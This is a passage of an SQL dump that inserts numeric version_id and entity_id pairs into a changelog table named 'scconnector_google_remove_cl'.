(2950, 394),
(2951, 395),
(2952, 396),
(2953, 397),
(2954, 398),
(2955, 399),
(2956, 400),
(2957, 401),
(2958, 402),
(2959, 403),
(2960, 404),
(2961, 405),
(2962, 406),
(2963, 407),
(2964, 408),
(2965, 409),
(2966, 410),
(2967, 411),
(2968, 412),
(2969, 413),
(2970, 414),
(2971, 415),
(2972, 416),
(2973, 417),
(2974, 418),
(2975, 419),
(2976, 420),
(2977, 421),
(2978, 422),
(2979, 423),
(2980, 424),
(2981, 425),
(2982, 426),
(2983, 427),
(2984, 428),
(2985, 429),
(2986, 430),
(2987, 431),
(2988, 432),
(2989, 433),
(2990, 434),
(2991, 435),
(2992, 436),
(2993, 437),
(2994, 438),
(2995, 439),
(2996, 440),
(2997, 441),
(2998, 442),
(2999, 443),
(3000, 444),
(3001, 445),
(3002, 446),
(3003, 447),
(3004, 448),
(3005, 449),
(3006, 450),
(3007, 451),
(3008, 452),
(3009, 453),
(3010, 454),
(3011, 455),
(3012, 456),
(3013, 457),
(3014, 458),
(3015, 459),
(3016, 360),
(3017, 360),
(3018, 360),
(3019, 360),
(3020, 360),
(3021, 360),
(3022, 361),
(3023, 361),
(3024, 361),
(3025, 361),
(3026, 361),
(3027, 361),
(3028, 362),
(3029, 362),
(3030, 362),
(3031, 362),
(3032, 362),
(3033, 362),
(3034, 363),
(3035, 363),
(3036, 363),
(3037, 363),
(3038, 363),
(3039, 363),
(3040, 363),
(3041, 363),
(3042, 363),
(3043, 364),
(3044, 364),
(3045, 364),
(3046, 364),
(3047, 364),
(3048, 364),
(3049, 365),
(3050, 365),
(3051, 365),
(3052, 365),
(3053, 365),
(3054, 365),
(3055, 366),
(3056, 366),
(3057, 366),
(3058, 366),
(3059, 366),
(3060, 366),
(3061, 367),
(3062, 367),
(3063, 367),
(3064, 367),
(3065, 367),
(3066, 367),
(3067, 368),
(3068, 368),
(3069, 368),
(3070, 368),
(3071, 368),
(3072, 368),
(3073, 369),
(3074, 369),
(3075, 369),
(3076, 369),
(3077, 369),
(3078, 369),
(3079, 370),
(3080, 370),
(3081, 370),
(3082, 370),
(3083, 370),
(3084, 370),
(3085, 371),
(3086, 371),
(3087, 371),
(3088, 371),
(3089, 371),
(3090, 371),
(3091, 372),
(3092, 372),
(3093, 372),
(3094, 372),
(3095, 372),
(3096, 372),
(3097, 373),
(3098, 373),
(3099, 373),
(3100, 373),
(3101, 373),
(3102, 373),
(3103, 374),
(3104, 374),
(3105, 374),
(3106, 374),
(3107, 374),
(3108, 374),
(3109, 375),
(3110, 375),
(3111, 375),
(3112, 375),
(3113, 375),
(3114, 375),
(3115, 376),
(3116, 376),
(3117, 376),
(3118, 376),
(3119, 376),
(3120, 376),
(3121, 377),
(3122, 377),
(3123, 377),
(3124, 377),
(3125, 377),
(3126, 377),
(3127, 378),
(3128, 378),
(3129, 378),
(3130, 378),
(3131, 378),
(3132, 378),
(3133, 379),
(3134, 379),
(3135, 379),
(3136, 379),
(3137, 379),
(3138, 379),
(3139, 379),
(3140, 379),
(3141, 379),
(3142, 380),
(3143, 380),
(3144, 380),
(3145, 380),
(3146, 380),
(3147, 380),
(3148, 381),
(3149, 381),
(3150, 381),
(3151, 381),
(3152, 381),
(3153, 381),
(3154, 382),
(3155, 382),
(3156, 382),
(3157, 382),
(3158, 382),
(3159, 382),
(3160, 383),
(3161, 383),
(3162, 383),
(3163, 383),
(3164, 383),
(3165, 383),
(3166, 384),
(3167, 384),
(3168, 384),
(3169, 384),
(3170, 384),
(3171, 384),
(3172, 385),
(3173, 385),
(3174, 385),
(3175, 385),
(3176, 385),
(3177, 385),
(3178, 386),
(3179, 386),
(3180, 386),
(3181, 386),
(3182, 386),
(3183, 386),
(3184, 387),
(3185, 387),
(3186, 387),
(3187, 387),
(3188, 387),
(3189, 387),
(3190, 388),
(3191, 388),
(3192, 388),
(3193, 388),
(3194, 388),
(3195, 388),
(3196, 389),
(3197, 389),
(3198, 389),
(3199, 389),
(3200, 389),
(3201, 389),
(3202, 390),
(3203, 390),
(3204, 390),
(3205, 390),
(3206, 390),
(3207, 390),
(3208, 391),
(3209, 391),
(3210, 391),
(3211, 391),
(3212, 391),
(3213, 391),
(3214, 392),
(3215, 392),
(3216, 392),
(3217, 392),
(3218, 392),
(3219, 392),
(3220, 393),
(3221, 393),
(3222, 393),
(3223, 393),
(3224, 393),
(3225, 393),
(3226, 394),
(3227, 394),
(3228, 394),
(3229, 394),
(3230, 394),
(3231, 394),
(3232, 395),
(3233, 395),
(3234, 395),
(3235, 395),
(3236, 395),
(3237, 395),
(3238, 395),
(3239, 395),
(3240, 395),
(3241, 396),
(3242, 396),
(3243, 396),
(3244, 396),
(3245, 396),
(3246, 396),
(3247, 397),
(3248, 397),
(3249, 397),
(3250, 397),
(3251, 397),
(3252, 397),
(3253, 398),
(3254, 398),
(3255, 398),
(3256, 398),
(3257, 398),
(3258, 398),
(3259, 399),
(3260, 399),
(3261, 399),
(3262, 399),
(3263, 399),
(3264, 399),
(3265, 400),
(3266, 400),
(3267, 400),
(3268, 400),
(3269, 400),
(3270, 400),
(3271, 401),
(3272, 401),
(3273, 401),
(3274, 401),
(3275, 401),
(3276, 401),
(3277, 402),
(3278, 402),
(3279, 402),
(3280, 402),
(3281, 402),
(3282, 402),
(3283, 403),
(3284, 403),
(3285, 403),
(3286, 403),
(3287, 403),
(3288, 403),
(3289, 404),
(3290, 404),
(3291, 404),
(3292, 404),
(3293, 404),
(3294, 404),
(3295, 405),
(3296, 405),
(3297, 405),
(3298, 405),
(3299, 405),
(3300, 405),
(3301, 406),
(3302, 406),
(3303, 406),
(3304, 406),
(3305, 406),
(3306, 406),
(3307, 407),
(3308, 407),
(3309, 407),
(3310, 407),
(3311, 407),
(3312, 407),
(3313, 408),
(3314, 408),
(3315, 408),
(3316, 408),
(3317, 408),
(3318, 408),
(3319, 409),
(3320, 409),
(3321, 409),
(3322, 409),
(3323, 409),
(3324, 409),
(3325, 410),
(3326, 410),
(3327, 410),
(3328, 410),
(3329, 410),
(3330, 410),
(3331, 411),
(3332, 411),
(3333, 411),
(3334, 411),
(3335, 411),
(3336, 411),
(3337, 411),
(3338, 411),
(3339, 411),
(3340, 412),
(3341, 412),
(3342, 412),
(3343, 412),
(3344, 412),
(3345, 412),
(3346, 413),
(3347, 413),
(3348, 413),
(3349, 413),
(3350, 413),
(3351, 413),
(3352, 414),
(3353, 414),
(3354, 414),
(3355, 414),
(3356, 414),
(3357, 414),
(3358, 415),
(3359, 415),
(3360, 415),
(3361, 415),
(3362, 415),
(3363, 415),
(3364, 416),
(3365, 416),
(3366, 416),
(3367, 416),
(3368, 416),
(3369, 416),
(3370, 417),
(3371, 417),
(3372, 417),
(3373, 417),
(3374, 417),
(3375, 417),
(3376, 418),
(3377, 418),
(3378, 418),
(3379, 418),
(3380, 418),
(3381, 418),
(3382, 419),
(3383, 419),
(3384, 419),
(3385, 419),
(3386, 419),
(3387, 419),
(3388, 420),
(3389, 420),
(3390, 420),
(3391, 420),
(3392, 420),
(3393, 420),
(3394, 421),
(3395, 421),
(3396, 421),
(3397, 421),
(3398, 421),
(3399, 421),
(3400, 422),
(3401, 422),
(3402, 422),
(3403, 422),
(3404, 422),
(3405, 422),
(3406, 423),
(3407, 423),
(3408, 423),
(3409, 423),
(3410, 423),
(3411, 423),
(3412, 424),
(3413, 424),
(3414, 424),
(3415, 424),
(3416, 424),
(3417, 424),
(3418, 425),
(3419, 425),
(3420, 425),
(3421, 425),
(3422, 425),
(3423, 425),
(3424, 426),
(3425, 426),
(3426, 426),
(3427, 426),
(3428, 426),
(3429, 426),
(3430, 427),
(3431, 427),
(3432, 427),
(3433, 427),
(3434, 427),
(3435, 427),
(3436, 427),
(3437, 427),
(3438, 427),
(3439, 428),
(3440, 428),
(3441, 428),
(3442, 428),
(3443, 428),
(3444, 428),
(3445, 429),
(3446, 429),
(3447, 429),
(3448, 429),
(3449, 429),
(3450, 429),
(3451, 430),
(3452, 430),
(3453, 430),
(3454, 430),
(3455, 430),
(3456, 430),
(3457, 431),
(3458, 431),
(3459, 431),
(3460, 431),
(3461, 431),
(3462, 431),
(3463, 432),
(3464, 432),
(3465, 432),
(3466, 432),
(3467, 432),
(3468, 432),
(3469, 433),
(3470, 433),
(3471, 433),
(3472, 433),
(3473, 433),
(3474, 433),
(3475, 434),
(3476, 434),
(3477, 434),
(3478, 434),
(3479, 434),
(3480, 434),
(3481, 435),
(3482, 435),
(3483, 435),
(3484, 435),
(3485, 435),
(3486, 435),
(3487, 436),
(3488, 436),
(3489, 436),
(3490, 436),
(3491, 436),
(3492, 436),
(3493, 437),
(3494, 437),
(3495, 437),
(3496, 437),
(3497, 437),
(3498, 437),
(3499, 438),
(3500, 438),
(3501, 438),
(3502, 438),
(3503, 438),
(3504, 438),
(3505, 439),
(3506, 439),
(3507, 439),
(3508, 439),
(3509, 439),
(3510, 439),
(3511, 440),
(3512, 440),
(3513, 440),
(3514, 440),
(3515, 440),
(3516, 440),
(3517, 441),
(3518, 441),
(3519, 441),
(3520, 441),
(3521, 441),
(3522, 441),
(3523, 442),
(3524, 442),
(3525, 442),
(3526, 442),
(3527, 442),
(3528, 442),
(3529, 443),
(3530, 443),
(3531, 443),
(3532, 443),
(3533, 443),
(3534, 443),
(3535, 443),
(3536, 443),
(3537, 443),
(3538, 444),
(3539, 444),
(3540, 444),
(3541, 444),
(3542, 444),
(3543, 444),
(3544, 445),
(3545, 445),
(3546, 445),
(3547, 445),
(3548, 445),
(3549, 445),
(3550, 446),
(3551, 446),
(3552, 446),
(3553, 446),
(3554, 446),
(3555, 446),
(3556, 447),
(3557, 447),
(3558, 447),
(3559, 447),
(3560, 447),
(3561, 447),
(3562, 448),
(3563, 448),
(3564, 448),
(3565, 448),
(3566, 448),
(3567, 448),
(3568, 449),
(3569, 449),
(3570, 449),
(3571, 449),
(3572, 449),
(3573, 449),
(3574, 450),
(3575, 450),
(3576, 450),
(3577, 450),
(3578, 450),
(3579, 450),
(3580, 451),
(3581, 451),
(3582, 451),
(3583, 451),
(3584, 451),
(3585, 451),
(3586, 452),
(3587, 452),
(3588, 452),
(3589, 452),
(3590, 452),
(3591, 452),
(3592, 453),
(3593, 453),
(3594, 453),
(3595, 453),
(3596, 453),
(3597, 453),
(3598, 454),
(3599, 454),
(3600, 454),
(3601, 454),
(3602, 454),
(3603, 454),
(3604, 455),
(3605, 455),
(3606, 455),
(3607, 455),
(3608, 455),
(3609, 455),
(3610, 456),
(3611, 456),
(3612, 456),
(3613, 456),
(3614, 456),
(3615, 456),
(3616, 457),
(3617, 457),
(3618, 457),
(3619, 457),
(3620, 457),
(3621, 457),
(3622, 458),
(3623, 458),
(3624, 458),
(3625, 458),
(3626, 458),
(3627, 458),
(3628, 459),
(3629, 459),
(3630, 459),
(3631, 459),
(3632, 459),
(3633, 459),
(3634, 459),
(3635, 459),
(3636, 459),
(3637, 460),
(3638, 461),
(3639, 462),
(3640, 463),
(3641, 464),
(3642, 465),
(3643, 466),
(3644, 467),
(3645, 468),
(3646, 469),
(3647, 470),
(3648, 471),
(3649, 472),
(3650, 473),
(3651, 474),
(3652, 475),
(3653, 476),
(3654, 477),
(3655, 478),
(3656, 479),
(3657, 480),
(3658, 481),
(3659, 482),
(3660, 483),
(3661, 484),
(3662, 485),
(3663, 486),
(3664, 487),
(3665, 488),
(3666, 489),
(3667, 490),
(3668, 491),
(3669, 492),
(3670, 493),
(3671, 494),
(3672, 495),
(3673, 496),
(3674, 497),
(3675, 498),
(3676, 499),
(3677, 500),
(3678, 501),
(3679, 502),
(3680, 503),
(3681, 504),
(3682, 505),
(3683, 506),
(3684, 507),
(3685, 508),
(3686, 509),
(3687, 510),
(3688, 511),
(3689, 512),
(3690, 513),
(3691, 514),
(3692, 515),
(3693, 516),
(3694, 517),
(3695, 518),
(3696, 519),
(3697, 520),
(3698, 521),
(3699, 522),
(3700, 523),
(3701, 524),
(3702, 525),
(3703, 526),
(3704, 527),
(3705, 528),
(3706, 529),
(3707, 530),
(3708, 531),
(3709, 532),
(3710, 533),
(3711, 534),
(3712, 535),
(3713, 536),
(3714, 537),
(3715, 538),
(3716, 539),
(3717, 540),
(3718, 541),
(3719, 542),
(3720, 543),
(3721, 544),
(3722, 545),
(3723, 546),
(3724, 547),
(3725, 548),
(3726, 549),
(3727, 550),
(3728, 551),
(3729, 552),
(3730, 553),
(3731, 554),
(3732, 555),
(3733, 556),
(3734, 557),
(3735, 558),
(3736, 559),
(3737, 460),
(3738, 461),
(3739, 462),
(3740, 463),
(3741, 464),
(3742, 465),
(3743, 466),
(3744, 467),
(3745, 468),
(3746, 469),
(3747, 470),
(3748, 471),
(3749, 472),
(3750, 473),
(3751, 474),
(3752, 475),
(3753, 476),
(3754, 477),
(3755, 478),
(3756, 479),
(3757, 480),
(3758, 481),
(3759, 482),
(3760, 483),
(3761, 484),
(3762, 485),
(3763, 486),
(3764, 487),
(3765, 488),
(3766, 489),
(3767, 490),
(3768, 491),
(3769, 492),
(3770, 493),
(3771, 494),
(3772, 495),
(3773, 496),
(3774, 497),
(3775, 498),
(3776, 499),
(3777, 500),
(3778, 501),
(3779, 502),
(3780, 503),
(3781, 504),
(3782, 505),
(3783, 506),
(3784, 507),
(3785, 508),
(3786, 509),
(3787, 510),
(3788, 511),
(3789, 512),
(3790, 513),
(3791, 514),
(3792, 515),
(3793, 516),
(3794, 517),
(3795, 518),
(3796, 519),
(3797, 520),
(3798, 521),
(3799, 522),
(3800, 523),
(3801, 524),
(3802, 525),
(3803, 526),
(3804, 527),
(3805, 528),
(3806, 529),
(3807, 530),
(3808, 531),
(3809, 532),
(3810, 533),
(3811, 534),
(3812, 535),
(3813, 536),
(3814, 537),
(3815, 538),
(3816, 539),
(3817, 540),
(3818, 541),
(3819, 542),
(3820, 543),
(3821, 544),
(3822, 545),
(3823, 546),
(3824, 547),
(3825, 548),
(3826, 549),
(3827, 550),
(3828, 551),
(3829, 552),
(3830, 553),
(3831, 554),
(3832, 555),
(3833, 556),
(3834, 557),
(3835, 558),
(3836, 559),
(3837, 460),
(3838, 460),
(3839, 460),
(3840, 460),
(3841, 460),
(3842, 460),
(3843, 461),
(3844, 461),
(3845, 461),
(3846, 461),
(3847, 461),
(3848, 461),
(3849, 462),
(3850, 462),
(3851, 462),
(3852, 462),
(3853, 462),
(3854, 462),
(3855, 463),
(3856, 463),
(3857, 463),
(3858, 463),
(3859, 463),
(3860, 463),
(3861, 464),
(3862, 464),
(3863, 464),
(3864, 464),
(3865, 464),
(3866, 464),
(3867, 465),
(3868, 465),
(3869, 465),
(3870, 465),
(3871, 465),
(3872, 465),
(3873, 466),
(3874, 466),
(3875, 466),
(3876, 466),
(3877, 466),
(3878, 466),
(3879, 467),
(3880, 467),
(3881, 467),
(3882, 467),
(3883, 467),
(3884, 467),
(3885, 468),
(3886, 468),
(3887, 468),
(3888, 468),
(3889, 468),
(3890, 468),
(3891, 469),
(3892, 469),
(3893, 469),
(3894, 469),
(3895, 469),
(3896, 469),
(3897, 470),
(3898, 470),
(3899, 470),
(3900, 470),
(3901, 470),
(3902, 470),
(3903, 471),
(3904, 471),
(3905, 471),
(3906, 471),
(3907, 471),
(3908, 471),
(3909, 472),
(3910, 472),
(3911, 472),
(3912, 472),
(3913, 472),
(3914, 472),
(3915, 473),
(3916, 473),
(3917, 473),
(3918, 473),
(3919, 473),
(3920, 473),
(3921, 474),
(3922, 474),
(3923, 474),
(3924, 474),
(3925, 474),
(3926, 474),
(3927, 475),
(3928, 475),
(3929, 475),
(3930, 475),
(3931, 475),
(3932, 475),
(3933, 475),
(3934, 475),
(3935, 475),
(3936, 476),
(3937, 476),
(3938, 476),
(3939, 476),
(3940, 476),
(3941, 476),
(3942, 477),
(3943, 477),
(3944, 477),
(3945, 477),
(3946, 477),
(3947, 477),
(3948, 478),
(3949, 478),
(3950, 478),
(3951, 478),
(3952, 478),
(3953, 478),
(3954, 479),
(3955, 479),
(3956, 479),
(3957, 479),
(3958, 479),
(3959, 479),
(3960, 480),
(3961, 480),
(3962, 480),
(3963, 480),
(3964, 480),
(3965, 480),
(3966, 481),
(3967, 481),
(3968, 481),
(3969, 481),
(3970, 481),
(3971, 481),
(3972, 482),
(3973, 482),
(3974, 482),
(3975, 482),
(3976, 482),
(3977, 482),
(3978, 483),
(3979, 483),
(3980, 483),
(3981, 483),
(3982, 483),
(3983, 483),
(3984, 484),
(3985, 484),
(3986, 484),
(3987, 484),
(3988, 484),
(3989, 484),
(3990, 485),
(3991, 485),
(3992, 485),
(3993, 485),
(3994, 485),
(3995, 485),
(3996, 486),
(3997, 486),
(3998, 486),
(3999, 486),
(4000, 486),
(4001, 486),
(4002, 487),
(4003, 487),
(4004, 487),
(4005, 487),
(4006, 487),
(4007, 487),
(4008, 488),
(4009, 488),
(4010, 488),
(4011, 488),
(4012, 488),
(4013, 488),
(4014, 489),
(4015, 489),
(4016, 489),
(4017, 489),
(4018, 489),
(4019, 489),
(4020, 490),
(4021, 490),
(4022, 490),
(4023, 490),
(4024, 490),
(4025, 490),
(4026, 491),
(4027, 491),
(4028, 491),
(4029, 491),
(4030, 491),
(4031, 491),
(4032, 491),
(4033, 491),
(4034, 491),
(4035, 492),
(4036, 492),
(4037, 492),
(4038, 492),
(4039, 492),
(4040, 492),
(4041, 493),
(4042, 493),
(4043, 493),
(4044, 493),
(4045, 493),
(4046, 493),
(4047, 494),
(4048, 494),
(4049, 494),
(4050, 494),
(4051, 494),
(4052, 494),
(4053, 495),
(4054, 495),
(4055, 495),
(4056, 495),
(4057, 495),
(4058, 495),
(4059, 496),
(4060, 496),
(4061, 496),
(4062, 496),
(4063, 496),
(4064, 496),
(4065, 497),
(4066, 497),
(4067, 497),
(4068, 497),
(4069, 497),
(4070, 497),
(4071, 498),
(4072, 498),
(4073, 498),
(4074, 498),
(4075, 498),
(4076, 498),
(4077, 499),
(4078, 499),
(4079, 499),
(4080, 499),
(4081, 499),
(4082, 499),
(4083, 500),
(4084, 500),
(4085, 500),
(4086, 500),
(4087, 500),
(4088, 500),
(4089, 501),
(4090, 501),
(4091, 501),
(4092, 501),
(4093, 501),
(4094, 501),
(4095, 502),
(4096, 502),
(4097, 502),
(4098, 502),
(4099, 502),
(4100, 502),
(4101, 503),
(4102, 503),
(4103, 503),
(4104, 503),
(4105, 503),
(4106, 503),
(4107, 504),
(4108, 504),
(4109, 504),
(4110, 504),
(4111, 504),
(4112, 504),
(4113, 505),
(4114, 505),
(4115, 505),
(4116, 505),
(4117, 505),
(4118, 505),
(4119, 506),
(4120, 506),
(4121, 506),
(4122, 506),
(4123, 506),
(4124, 506),
(4125, 507),
(4126, 507),
(4127, 507),
(4128, 507),
(4129, 507),
(4130, 507),
(4131, 507),
(4132, 507),
(4133, 507),
(4134, 508),
(4135, 508),
(4136, 508),
(4137, 508),
(4138, 508),
(4139, 508),
(4140, 509),
(4141, 509),
(4142, 509),
(4143, 509),
(4144, 509),
(4145, 509),
(4146, 510),
(4147, 510),
(4148, 510),
(4149, 510),
(4150, 510),
(4151, 510),
(4152, 511),
(4153, 511),
(4154, 511),
(4155, 511),
(4156, 511),
(4157, 511),
(4158, 512),
(4159, 512),
(4160, 512),
(4161, 512),
(4162, 512),
(4163, 512),
(4164, 513),
(4165, 513),
(4166, 513),
(4167, 513),
(4168, 513),
(4169, 513),
(4170, 514),
(4171, 514),
(4172, 514),
(4173, 514),
(4174, 514),
(4175, 514),
(4176, 515),
(4177, 515),
(4178, 515),
(4179, 515),
(4180, 515),
(4181, 515),
(4182, 516),
(4183, 516),
(4184, 516),
(4185, 516),
(4186, 516),
(4187, 516),
(4188, 517),
(4189, 517),
(4190, 517),
(4191, 517),
(4192, 517),
(4193, 517),
(4194, 518),
(4195, 518),
(4196, 518),
(4197, 518),
(4198, 518),
(4199, 518),
(4200, 519),
(4201, 519),
(4202, 519),
(4203, 519),
(4204, 519),
(4205, 519),
(4206, 520),
(4207, 520),
(4208, 520),
(4209, 520),
(4210, 520),
(4211, 520),
(4212, 521),
(4213, 521),
(4214, 521),
(4215, 521),
(4216, 521),
(4217, 521),
(4218, 522),
(4219, 522),
(4220, 522),
(4221, 522),
(4222, 522),
(4223, 522),
(4224, 523),
(4225, 523),
(4226, 523),
(4227, 523),
(4228, 523),
(4229, 523),
(4230, 523),
(4231, 523),
(4232, 523),
(4233, 524),
(4234, 524),
(4235, 524),
(4236, 524),
(4237, 524),
(4238, 524),
(4239, 525),
(4240, 525),
(4241, 525),
(4242, 525),
(4243, 525),
(4244, 525),
(4245, 526),
(4246, 526),
(4247, 526),
(4248, 526),
(4249, 526),
(4250, 526),
(4251, 527),
(4252, 527),
(4253, 527),
(4254, 527),
(4255, 527),
(4256, 527),
(4257, 528),
(4258, 528),
(4259, 528),
(4260, 528),
(4261, 528),
(4262, 528),
(4263, 529),
(4264, 529),
(4265, 529),
(4266, 529),
(4267, 529),
(4268, 529),
(4269, 530),
(4270, 530),
(4271, 530),
(4272, 530),
(4273, 530),
(4274, 530),
(4275, 531),
(4276, 531),
(4277, 531),
(4278, 531),
(4279, 531),
(4280, 531),
(4281, 532),
(4282, 532),
(4283, 532),
(4284, 532),
(4285, 532),
(4286, 532),
(4287, 533),
(4288, 533),
(4289, 533),
(4290, 533),
(4291, 533),
(4292, 533),
(4293, 534),
(4294, 534),
(4295, 534),
(4296, 534),
(4297, 534),
(4298, 534),
(4299, 535),
(4300, 535),
(4301, 535),
(4302, 535),
(4303, 535),
(4304, 535),
(4305, 536),
(4306, 536),
(4307, 536),
(4308, 536),
(4309, 536),
(4310, 536),
(4311, 537),
(4312, 537),
(4313, 537),
(4314, 537),
(4315, 537),
(4316, 537),
(4317, 538),
(4318, 538),
(4319, 538),
(4320, 538),
(4321, 538),
(4322, 538),
(4323, 539),
(4324, 539),
(4325, 539),
(4326, 539),
(4327, 539),
(4328, 539),
(4329, 539),
(4330, 539),
(4331, 539),
(4332, 540),
(4333, 540),
(4334, 540),
(4335, 540),
(4336, 540),
(4337, 540),
(4338, 541),
(4339, 541),
(4340, 541),
(4341, 541),
(4342, 541),
(4343, 541),
(4344, 542),
(4345, 542),
(4346, 542),
(4347, 542),
(4348, 542),
(4349, 542),
(4350, 543),
(4351, 543),
(4352, 543),
(4353, 543),
(4354, 543),
(4355, 543),
(4356, 544),
(4357, 544),
(4358, 544),
(4359, 544),
(4360, 544),
(4361, 544),
(4362, 545),
(4363, 545),
(4364, 545),
(4365, 545),
(4366, 545),
(4367, 545),
(4368, 546),
(4369, 546),
(4370, 546),
(4371, 546),
(4372, 546),
(4373, 546),
(4374, 547),
(4375, 547),
(4376, 547),
(4377, 547),
(4378, 547),
(4379, 547),
(4380, 548),
(4381, 548),
(4382, 548),
(4383, 548),
(4384, 548),
(4385, 548),
(4386, 549),
(4387, 549),
(4388, 549),
(4389, 549),
(4390, 549),
(4391, 549),
(4392, 550),
(4393, 550),
(4394, 550),
(4395, 550),
(4396, 550),
(4397, 550),
(4398, 551),
(4399, 551),
(4400, 551),
(4401, 551),
(4402, 551),
(4403, 551),
(4404, 552),
(4405, 552),
(4406, 552),
(4407, 552),
(4408, 552),
(4409, 552),
(4410, 553),
(4411, 553),
(4412, 553),
(4413, 553),
(4414, 553),
(4415, 553),
(4416, 554),
(4417, 554),
(4418, 554),
(4419, 554),
(4420, 554),
(4421, 554),
(4422, 555),
(4423, 555),
(4424, 555),
(4425, 555),
(4426, 555),
(4427, 555),
(4428, 555),
(4429, 555),
(4430, 555),
(4431, 556),
(4432, 556),
(4433, 556),
(4434, 556),
(4435, 556),
(4436, 556),
(4437, 557),
(4438, 557),
(4439, 557),
(4440, 557),
(4441, 557),
(4442, 557),
(4443, 558),
(4444, 558),
(4445, 558),
(4446, 558),
(4447, 558),
(4448, 558),
(4449, 559),
(4450, 559),
(4451, 559),
(4452, 559),
(4453, 559),
(4454, 559),
(4455, 560),
(4456, 561),
(4457, 562),
(4458, 563),
(4459, 564),
(4460, 565),
(4461, 566),
(4462, 567),
(4463, 568),
(4464, 569),
(4465, 570),
(4466, 571),
(4467, 572),
(4468, 573),
(4469, 574),
(4470, 575),
(4471, 576),
(4472, 577),
(4473, 578),
(4474, 579),
(4475, 580),
(4476, 581),
(4477, 582),
(4478, 583),
(4479, 584),
(4480, 585),
(4481, 586),
(4482, 587),
(4483, 588),
(4484, 589),
(4485, 590),
(4486, 591),
(4487, 592),
(4488, 593),
(4489, 594),
(4490, 595),
(4491, 596),
(4492, 597),
(4493, 598),
(4494, 599),
(4495, 600),
(4496, 601),
(4497, 602),
(4498, 603),
(4499, 604),
(4500, 605),
(4501, 606),
(4502, 607),
(4503, 608),
(4504, 609),
(4505, 610),
(4506, 611),
(4507, 612),
(4508, 613),
(4509, 614),
(4510, 615),
(4511, 616),
(4512, 617),
(4513, 618),
(4514, 619),
(4515, 620),
(4516, 621),
(4517, 622),
(4518, 623),
(4519, 624),
(4520, 625),
(4521, 626),
(4522, 627),
(4523, 628),
(4524, 629),
(4525, 630),
(4526, 631),
(4527, 632),
(4528, 633),
(4529, 634),
(4530, 635),
(4531, 636),
(4532, 637),
(4533, 638),
(4534, 639),
(4535, 640),
(4536, 641),
(4537, 642),
(4538, 643),
(4539, 644),
(4540, 645),
(4541, 646),
(4542, 647),
(4543, 648),
(4544, 649),
(4545, 650),
(4546, 651),
(4547, 652),
(4548, 653),
(4549, 654),
(4550, 655),
(4551, 656),
(4552, 657),
(4553, 658),
(4554, 659),
(4555, 560),
(4556, 561),
(4557, 562),
(4558, 563),
(4559, 564),
(4560, 565),
(4561, 566),
(4562, 567),
(4563, 568),
(4564, 569),
(4565, 570),
(4566, 571),
(4567, 572),
(4568, 573),
(4569, 574),
(4570, 575),
(4571, 576),
(4572, 577),
(4573, 578),
(4574, 579),
(4575, 580),
(4576, 581),
(4577, 582),
(4578, 583),
(4579, 584),
(4580, 585),
(4581, 586),
(4582, 587),
(4583, 588),
(4584, 589),
(4585, 590),
(4586, 591),
(4587, 592),
(4588, 593),
(4589, 594),
(4590, 595),
(4591, 596),
(4592, 597),
(4593, 598),
(4594, 599),
(4595, 600),
(4596, 601),
(4597, 602),
(4598, 603),
(4599, 604),
(4600, 605),
(4601, 606),
(4602, 607),
(4603, 608),
(4604, 609),
(4605, 610),
(4606, 611),
(4607, 612),
(4608, 613),
(4609, 614),
(4610, 615),
(4611, 616),
(4612, 617),
(4613, 618),
(4614, 619),
(4615, 620),
(4616, 621),
(4617, 622),
(4618, 623),
(4619, 624),
(4620, 625),
(4621, 626),
(4622, 627),
(4623, 628),
(4624, 629),
(4625, 630),
(4626, 631),
(4627, 632),
(4628, 633),
(4629, 634),
(4630, 635),
(4631, 636),
(4632, 637),
(4633, 638),
(4634, 639),
(4635, 640),
(4636, 641),
(4637, 642),
(4638, 643),
(4639, 644),
(4640, 645),
(4641, 646),
(4642, 647),
(4643, 648),
(4644, 649),
(4645, 650),
(4646, 651),
(4647, 652),
(4648, 653),
(4649, 654),
(4650, 655),
(4651, 656),
(4652, 657),
(4653, 658),
(4654, 659),
(4655, 560),
(4656, 560),
(4657, 560),
(4658, 560),
(4659, 560),
(4660, 560),
(4661, 561),
(4662, 561),
(4663, 561),
(4664, 561),
(4665, 561),
(4666, 561),
(4667, 562),
(4668, 562),
(4669, 562),
(4670, 562),
(4671, 562),
(4672, 562),
(4673, 563),
(4674, 563),
(4675, 563),
(4676, 563),
(4677, 563),
(4678, 563),
(4679, 564),
(4680, 564),
(4681, 564),
(4682, 564),
(4683, 564),
(4684, 564),
(4685, 565),
(4686, 565),
(4687, 565),
(4688, 565),
(4689, 565),
(4690, 565),
(4691, 566),
(4692, 566),
(4693, 566),
(4694, 566),
(4695, 566),
(4696, 566),
(4697, 567),
(4698, 567),
(4699, 567),
(4700, 567),
(4701, 567),
(4702, 567),
(4703, 568),
(4704, 568),
(4705, 568),
(4706, 568),
(4707, 568),
(4708, 568),
(4709, 569),
(4710, 569),
(4711, 569),
(4712, 569),
(4713, 569),
(4714, 569),
(4715, 570),
(4716, 570),
(4717, 570);
INSERT INTO `scconnector_google_remove_cl` (`version_id`, `entity_id`) VALUES
(4718, 570),
(4719, 570),
(4720, 570),
(4721, 571),
(4722, 571),
(4723, 571),
(4724, 571),
(4725, 571),
(4726, 571),
(4727, 571),
(4728, 571),
(4729, 571),
(4730, 572),
(4731, 572),
(4732, 572),
(4733, 572),
(4734, 572),
(4735, 572),
(4736, 573),
(4737, 573),
(4738, 573),
(4739, 573),
(4740, 573),
(4741, 573),
(4742, 574),
(4743, 574),
(4744, 574),
(4745, 574),
(4746, 574),
(4747, 574),
(4748, 575),
(4749, 575),
(4750, 575),
(4751, 575),
(4752, 575),
(4753, 575),
(4754, 576),
(4755, 576),
(4756, 576),
(4757, 576),
(4758, 576),
(4759, 576),
(4760, 577),
(4761, 577),
(4762, 577),
(4763, 577),
(4764, 577),
(4765, 577),
(4766, 578),
(4767, 578),
(4768, 578),
(4769, 578),
(4770, 578),
(4771, 578),
(4772, 579),
(4773, 579),
(4774, 579),
(4775, 579),
(4776, 579),
(4777, 579),
(4778, 580),
(4779, 580),
(4780, 580),
(4781, 580),
(4782, 580),
(4783, 580),
(4784, 581),
(4785, 581),
(4786, 581),
(4787, 581),
(4788, 581),
(4789, 581),
(4790, 582),
(4791, 582),
(4792, 582),
(4793, 582),
(4794, 582),
(4795, 582),
(4796, 583),
(4797, 583),
(4798, 583),
(4799, 583),
(4800, 583),
(4801, 583),
(4802, 584),
(4803, 584),
(4804, 584),
(4805, 584),
(4806, 584),
(4807, 584),
(4808, 585),
(4809, 585),
(4810, 585),
(4811, 585),
(4812, 585),
(4813, 585),
(4814, 586),
(4815, 586),
(4816, 586),
(4817, 586),
(4818, 586),
(4819, 586),
